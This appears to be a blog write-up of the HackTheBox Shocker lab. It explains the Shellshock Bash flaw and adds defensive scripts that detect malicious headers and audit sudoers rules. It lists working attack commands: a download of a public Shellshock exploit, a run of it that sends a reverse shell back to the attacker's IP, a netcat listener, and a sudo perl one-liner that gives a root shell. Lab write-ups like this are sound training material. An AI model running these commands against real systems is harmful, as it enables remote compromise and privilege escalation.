What Is Shellshock?
Shellshock was a major vulnerability that affected versions of Bash (the Bourne-Again Shell) before version 4.3. Bash is the command-line interface that many of us use to interact with Linux and Mac systems. The bug was particularly dangerous on web servers running Apache with CGI-bin scripts and on systems using OpenSSH.
The core of the problem was that an attacker could trick a vulnerable version of Bash into running arbitrary commands. Bash imported function definitions stored in environment variables and, because of the bug, also executed any commands that followed the definition; since CGI passes HTTP request headers to the script as environment variables, a web request could reach Bash directly. In the context of a web server, this meant an attacker could send a specially crafted HTTP request and get the server to execute commands, leading to a full compromise.
The best way to fix this, of course, is to update Bash to a patched version and to be very careful about what scripts are running in your CGI-bin directory.
In this post, we cover the demonstration, exploitation and mitigation of the Shellshock vulnerability, using the HackTheBox Shocker lab as the target.
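Because the attack travels inside ordinary HTTP header values, the defensive counterpart to patching Bash is spotting those headers in traffic or logs. The script below is an added example written for this post (it is not the author's code and not part of HackTheBox or shocker.py): it parses the header block of an HTTP/1.x request and flags any header whose value starts with the Bash function-definition marker that public IDS and WAF signatures for Shellshock look for. The two requests it inspects are constructed samples, and the host name and the command after the marker are placeholders.

```python
import re
from typing import Dict, List

# Signature shared by public IDS/WAF rules for Shellshock: a header value that
# opens with a Bash function definition, "() {", which a vulnerable Bash would
# import from the CGI environment and then keep executing past the braces.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_request_headers(raw: str) -> Dict[str, str]:
    """Parse the header block of an HTTP/1.x request into {lowercase-name: value}."""
    headers: Dict[str, str] = {}
    lines = raw.split("\r\n")
    for line in lines[1:]:          # lines[0] is the request line
        if not line:                # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def find_shellshock_headers(raw_request: str) -> List[str]:
    """Return the (lowercased) names of headers carrying the Shellshock marker."""
    headers = parse_request_headers(raw_request)
    return sorted(name for name, value in headers.items() if SHELLSHOCK_RE.search(value))


def targets_cgi(raw_request: str) -> bool:
    """True when the request line points at a CGI path, which raises the severity."""
    request_line = raw_request.split("\r\n", 1)[0]
    parts = request_line.split()
    return len(parts) >= 2 and parts[1].startswith("/cgi-bin/")


# Constructed sample requests (not captured traffic); host and payload are placeholders.
BENIGN_REQUEST = (
    "GET /cgi-bin/user.sh HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "\r\n"
)
SUSPICIOUS_REQUEST = (
    "GET /cgi-bin/user.sh HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: () { :; }; echo CONSTRUCTED-SAMPLE\r\n"
    "Referer: () {:;}; echo CONSTRUCTED-SAMPLE\r\n"
    "\r\n"
)


def main() -> None:
    for label, request in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        hits = find_shellshock_headers(request)
        if hits:
            severity = "HIGH (CGI path)" if targets_cgi(request) else "MEDIUM"
            print(f"{label}: ALERT {severity} in headers {', '.join(hits)}")
        else:
            print(f"{label}: clean")


if __name__ == "__main__":
    main()
```

The check deliberately matches the marker anywhere in the value and ignores whitespace between the parentheses and the brace, since either form reaches Bash the same way. On a real server the same regex can be applied to the header fields Apache logs (User-Agent, Referer) or to a full request capture.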
The Live Hack
For my demonstration, I’m targeting a machine that’s running an Apache web server.
- Reconnaissance: I start with an Nmap scan and find that ports 80 (for HTTP) and 2222 (for SSH) are open. I then use a tool called dirb to look for hidden directories on the web server and quickly find a `cgi-bin` directory. A further search inside that directory reveals a Bash script named `user.sh`.
- Proof of Concept: Now that I have a target script, I need to see if it’s vulnerable. I use the `curl` command to send a specially crafted HTTP request to the script. My payload is a simple ping command that tries to ping my own machine. I fire up tcpdump on my end to listen for the incoming ping, but it doesn’t work.
- Getting a Shell: Since the ping didn’t work, I switch to a more direct approach: a reverse shell. I craft a new `curl` command, but this time the payload is a one-liner that will create a reverse shell connection back to my machine. I start a Netcat listener on my end, send the request, and just like that, I get a shell on the target machine!
- Trying Another Way: Just to show there’s more than one way to do this, I also use a Python script called `shocker.py` that automates the Shellshock exploit. I download the script, run it with the target’s information, and get a second reverse shell.
- Privilege Escalation: Now that I’m in, I need to get root access. I run `sudo -l` to see what commands I can run with `sudo`. It turns out I can run `perl` as the root user without a password. This is a huge win! I use a simple `perl` command to execute a shell, and because I ran it with `sudo`, the shell I get is a root shell. 👑
From there, I can navigate to the `/root` directory and grab the final flag.
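The root shell in the last step came from a single sudoers rule, so the matching hardening task is to find such rules before someone else does. The audit script below is an added example written for this post (not the author's code, and not part of the lab): it reads sudoers-style rules, keeps those that run as root, and reports any command that is either a shell-capable program such as the `perl` from this box or an unrestricted `ALL` granted with `NOPASSWD`. The sudoers text it checks is a constructed sample with placeholder user names, and the list of shell-capable programs is a starting point you would extend for your own hosts.

```python
import os
import re
from typing import Dict, List

# Programs that drop straight into a root shell when sudo runs them as root:
# the page's perl case plus shells and the common scripting interpreters.
# Constructed starting list for this audit; extend it for your environment.
SHELL_CAPABLE = {"perl", "python", "python3", "bash", "sh", "dash", "zsh"}

# Core sudoers rule shape:  user  host = (runas) TAG: cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Return one finding per root-level sudoers command that yields a root shell."""
    findings: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # strip comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        # "(root)", "(ALL)" and "(ALL:ALL)" all allow running as root.
        runas = (match.group("runas") or "root").split(":")[0].strip() or "root"
        if runas not in ("root", "ALL"):
            continue
        nopasswd = "NOPASSWD:" in match.group("tags")
        for cmd in match.group("cmds").split(","):
            cmd = cmd.strip()
            program = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            # Password-protected "ALL" is the normal admin grant; only flag it
            # when no password is required. Shell-capable programs are flagged
            # either way, with NOPASSWD raising the severity.
            if program == "ALL" and not nopasswd:
                continue
            if program == "ALL" or program in SHELL_CAPABLE:
                findings.append({
                    "user": match.group("user"),
                    "command": cmd,
                    "program": program,
                    "severity": "high" if nopasswd else "medium",
                })
    return findings


# Constructed sample sudoers (placeholder users, not taken from the target machine).
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
webuser ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) /usr/bin/python3
"""


def main() -> None:
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{finding['severity'].upper()}] {finding['user']} may run "
              f"{finding['command']} as root ({finding['program']} can spawn a shell)")


if __name__ == "__main__":
    main()
```

The rsync grant is left alone because the audit only knows about interpreters and shells; the fix for a flagged rule is to remove the interpreter from sudoers and grant a narrowly scoped wrapper script instead, or at least drop `NOPASSWD`.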
Technical Commands
Here’s a list of the commands I used in my terminal to exploit Shellshock and own this machine:
- Directory Brute-forcing:
dirb http://10.10.10.56
dirb http://10.10.10.56/cgi-bin/ -X .py,.sh
- Interacting with the Web Server:
curl http://10.10.10.56/cgi-bin/user.sh
- Network Utilities:
ifconfig
sudo tcpdump -i tun0
nc -lvp 4545
- Exploitation Scripts:
wget https://raw.githubusercontent.com/opsxcq/exploit-bashbug/master/shocker.py
python shocker.py -H 10.10.10.56 -u /cgi-bin/user.sh -l 10.10.14.7 -p 4546
- Privilege Escalation:
id
sudo -l
sudo perl -e 'exec "/bin/bash";'
- Basic Navigation:
ls
pwd
cd /root